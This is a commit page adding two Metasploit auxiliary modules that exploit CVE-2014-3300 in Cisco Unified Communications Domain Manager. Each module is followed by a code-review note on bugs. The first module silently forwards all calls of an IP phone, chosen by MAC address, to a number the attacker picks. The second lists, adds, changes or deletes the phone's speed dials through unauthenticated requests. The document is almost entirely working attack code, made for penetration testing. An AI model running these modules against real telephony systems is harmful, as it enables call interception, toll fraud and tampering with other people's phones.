
Commit f7af0d9

committed
Test landing rapid7#4065 into up to date branch
2 parents bedbffa + d91ffa8 commit f7af0d9


2 files changed

+277
-0
lines changed

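--- /dev/null
+++ b/PATH-NOT-SHOWN-file-1-of-2
@@ -0,0 +1,121 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+require 'rexml/document'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+include Msf::Exploit::Remote::HttpClient
+
+def initialize(info = {})
+super(
+'Name' => 'Viproy CUCDM IP Phone XML Services - Call Forwarding Tool',
+'Description' => %q{
+The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM)
+in Unified CDM Application Software before 10 does not properly implement access control,
+which allows remote attackers to modify user information. This vulnerability can be exploited
+for unauthorised call forwarding using this module. This tool can be tested with the fake
+voss-xmlservice component of Viproy.
+},
+'Author' => 'fozavci',
+'References' =>
+[
+['CVE', '2014-3300'],
+['BID', '68331'],
+['Viproy Fake CUCDM Service', 'https://github.com/fozavci/viproy-voipkit/raw/master/external/voss-xmlservice.rb']
+],
+'License' => MSF_LICENSE,
+'Actions' =>
+[
+[ 'Forward', {
+'Description' => 'Enabling the call forwarding for the MAC address.'
+} ],
+[ 'Info', {
+'Description' => 'Retrieving the call forwarding information for the MAC address.'
+} ]
+],
+'DefaultAction' => 'Info'
+
+)
+
+register_options(
+[
+OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
+OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
+OptString.new('FORWARDTO', [ true, 'Number to forward all calls', '007']),
+OptString.new('FINTNUMBER', [ false, 'FINTNUMBER of IP Phones, required for multiple lines', '']),
+], self.class)
+end
+
+def run
+uri = normalize_uri(target_uri.to_s)
+mac = Rex::Text.uri_encode(datastore["MAC"])
+forward_to = Rex::Text.uri_encode(datastore["FORWARDTO"])
+
+
+print_status("Getting fintnumbers and display names of the IP phone")
+
+uri_show=normalize_uri(uri+"/showcallfwd.cgi?device=SEP#{mac}")
+vprint_status("URL: "+uri_show)
+
+res = send_request_cgi(
+{
+'uri' => uri_show,
+'method' => 'GET',
+})
+
+if res and res.code == 200 and res.body =~ /fintnumber/
+doc = REXML::Document.new(res.body)
+lines=[]
+fintnumbers=[]
+
+list=doc.root.get_elements("MenuItem")
+list.each {|lst|
+xlist=lst.get_elements("Name")
+xlist.each {|l| lines << "#{l[0]}"}
+xlist=lst.get_elements("URL")
+xlist.each {|l| fintnumbers << "#{l[0].to_s.split("fintnumber=")[1]}" }
+}
+lines.size.times{|i| print_status("Display Name: "+lines[i]+"\t"+"Fintnumber: "+fintnumbers[i])}
+
+# for a specific FINTNUMBER redirection
+fintnumbers = [datastore["FINTNUMBER"]] if [datastore["FINTNUMBER"]]
+
+if action.name.upcase == "FORWARD"
+fintnumbers.each {|fintnumber|
+
+print_status("Sending call forward request for #{fintnumber}")
+
+uri_fwd=normalize_uri(uri+"/phonecallfwd.cgi?cfoption=CallForwardAll&device=SEP#{mac}&ProviderName=NULL&fintnumber=#{fintnumber}&telno1=#{forward_to}")
+vprint_status("URL: "+uri_fwd)
+res = send_request_cgi(
+{
+'uri' => uri_fwd,
+'method' => 'GET',
+})
+
+uri_fwdpln=normalize_uri(uri+"/showcallfwdperline.cgi?device=SEP#{mac}&fintnumber=#{fintnumber}")
+vprint_status("URL: "+uri_fwdpln)
+res = send_request_cgi(
+{
+'uri' => uri_fwdpln,
+'method' => 'GET',
+})
+
+if res and res.body and res.body.to_s =~ /CFA/
+print_good("Call forwarded successfully for #{fintnumber}")
+else
+print_status("Call forward failed.")
+end
+}
+end
+else
+print_error("Target appears not vulnerable!")
+end
+end
+end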
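Review bot: The guard on `fintnumbers = [datastore["FINTNUMBER"]] if [datastore["FINTNUMBER"]]` in `run` is always true, because a one-element array literal is truthy even when it holds the empty default, so the list parsed from the response is always discarded and the option no longer behaves as an optional override. Test the value itself, e.g. `fintnumbers = [datastore["FINTNUMBER"]] unless datastore["FINTNUMBER"].to_s.empty?`. The value is also interpolated into the request URI without `Rex::Text.uri_encode`, unlike `MAC` and `FORWARDTO`. Separately, `doc.root.get_elements("MenuItem")` assumes the response body is well-formed XML; a `nil` root or a `REXML::ParseException` from an unexpected body would end the run with a raw exception, so a `rescue REXML::ParseException` with a `print_error` is worth adding.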
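--- /dev/null
+++ b/PATH-NOT-SHOWN-file-2-of-2
@@ -0,0 +1,156 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rexml/document'
+
+class Metasploit3 < Msf::Auxiliary
+
+include Msf::Exploit::Remote::HttpClient
+
+def initialize(info = {})
+super(
+'Name' => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool',
+'Description' => %q{
+The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM)
+in Unified CDM Application Software before 10 does not properly implement access control,
+which allows remote attackers to modify user information. This vulnerability can be exploited
+for unauthorised speeddial manipulation using this module. This tool can be tested with the fake
+voss-xmlservice component of Viproy.
+},
+'Author' => 'fozavci',
+'References' =>
+[
+['CVE', '2014-3300'],
+['BID', '68331'],
+['Viproy Fake CUCDM Service', 'https://github.com/fozavci/viproy-voipkit/raw/master/external/voss-xmlservice.rb']
+],
+'License' => MSF_LICENSE,
+'Actions' =>
+[
+[ 'List', {
+'Description' => 'Getting the speeddials for the MAC address.'
+} ],
+[ 'Modify', {
+'Description' => 'Modifying a speeddial for the MAC address.'
+} ],
+[ 'Add', {
+'Description' => 'Adding a speeddial for the MAC address.'
+} ],
+[ 'Delete', {
+'Description' => 'Deleting a speeddial for the MAC address.'
+} ]
+],
+'DefaultAction' => 'List'
+)
+
+register_options(
+[
+Opt::RPORT(80),
+OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
+OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
+OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']),
+OptString.new('POSITION', [ false, 'Position for Speed Dial', '1']),
+OptString.new('TELNO', [ false, 'Phone number for Speed Dial', '007']),
+], self.class)
+end
+
+def run
+uri = normalize_uri(target_uri.to_s)
+mac = Rex::Text.uri_encode(datastore["MAC"])
+name = Rex::Text.uri_encode(datastore["NAME"])
+position = Rex::Text.uri_encode(datastore["POSITION"])
+telno = Rex::Text.uri_encode(datastore["TELNO"])
+
+
+case action.name.upcase
+when 'MODIFY'
+print_status("Deleting Speed Dial of the IP phone")
+url=uri+"/phonespeeddialdelete.cgi?entry=#{position}&device=SEP#{mac}"
+vprint_status("URL: "+url)
+status,res=send_rcv(url)
+if status != Exploit::CheckCode::Safe and res.body =~ /Deleted/
+print_good("Speed Dial #{position} is deleted successfully")
+print_status("Adding Speed Dial to the IP phone")
+url=uri+"/phonespeedialadd.cgi?name=#{name}&telno=#{telno}&device=SEP#{mac}&entry=#{position}&mac=#{mac}"
+vprint_status("URL: "+url)
+status,res=send_rcv(url)
+if status != Exploit::CheckCode::Safe and res.body =~ /Added/
+print_good("Speed Dial #{position} is added successfully")
+elsif res.body =~ /exist/
+print_error("Speed Dial is exist, change the position or choose modify!")
+else
+print_error("Speed Dial couldn't add!")
+end
+else
+print_error("Speed Dial is not found!")
+end
+when 'DELETE'
+print_status("Deleting Speed Dial of the IP phone")
+url=uri+"/phonespeeddialdelete.cgi?entry=#{position}&device=SEP#{mac}"
+vprint_status("URL: "+url)
+status,res=send_rcv(url)
+if status != Exploit::CheckCode::Safe and res.body =~ /Deleted/
+print_good("Speed Dial #{position} is deleted successfully")
+else
+print_error("Speed Dial is not found!")
+end
+when 'ADD'
+print_status("Adding Speed Dial to the IP phone")
+url=uri+"/phonespeedialadd.cgi?name=#{name}&telno=#{telno}&device=SEP#{mac}&entry=#{position}&mac=#{mac}"
+vprint_status("URL: "+url)
+status,res=send_rcv(url)
+if status != Exploit::CheckCode::Safe and res.body =~ /Added/
+print_good("Speed Dial #{position} is added successfully")
+elsif res.body =~ /exist/
+print_error("Speed Dial is exist, change the position or choose modify!")
+else
+print_error("Speed Dial couldn't add!")
+end
+else
+print_status("Getting Speed Dials of the IP phone")
+url=uri+"/speeddials.cgi?device=SEP#{mac}"
+vprint_status("URL: "+url)
+
+status,res=send_rcv(url)
+parse(res) if status != Exploit::CheckCode::Safe
+end
+
+end
+
+def send_rcv(uri)
+uri=normalize_uri(uri.to_s)
+res = send_request_cgi(
+{
+'uri' => uri,
+'method' => 'GET',
+})
+if res and res.code == 200 and res.body =~ /Speed [D|d]ial/
+return Exploit::CheckCode::Vulnerable,res
+else
+print_error("Target appears not vulnerable!")
+return Exploit::CheckCode::Safe,res
+end
+end
+
+def parse(res)
+doc = REXML::Document.new(res.body)
+names=[]
+phones=[]
+
+list=doc.root.get_elements("DirectoryEntry")
+list.each {|lst|
+xlist=lst.get_elements("Name")
+xlist.each {|l| names << "#{l[0]}"}
+xlist=lst.get_elements("Telephone")
+xlist.each {|l| phones << "#{l[0]}" }
+}
+if names.size > 0
+names.size.times{|i| print_good("Position: "+names[i].split(":")[0]+"\tName: "+names[i].split(":")[1]+"\t"+"Telephone: "+phones[i])}
+else
+print_status("No Speed Dial detected")
+end
+end
+end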
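Review bot: The `elsif res.body =~ /exist/` branches in the MODIFY and ADD cases of `run` are evaluated when `send_rcv` returned `Exploit::CheckCode::Safe`, and on that path `res` can be `nil` (the `if res and ...` test in `send_rcv` already allows for a missing response), so the module would raise `NoMethodError` instead of printing its error. Guard the branch, e.g. `elsif res && res.body =~ /exist/`. In `send_rcv` the character class in `/Speed [D|d]ial/` also accepts a literal `|`; `/Speed [Dd]ial/` is what the check means. `parse` is fragile in the same way: `names[i].split(":")[1]` is `nil` for a name without a colon and `doc.root` is `nil` for an empty document, and either makes the method raise rather than report an unexpected response.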
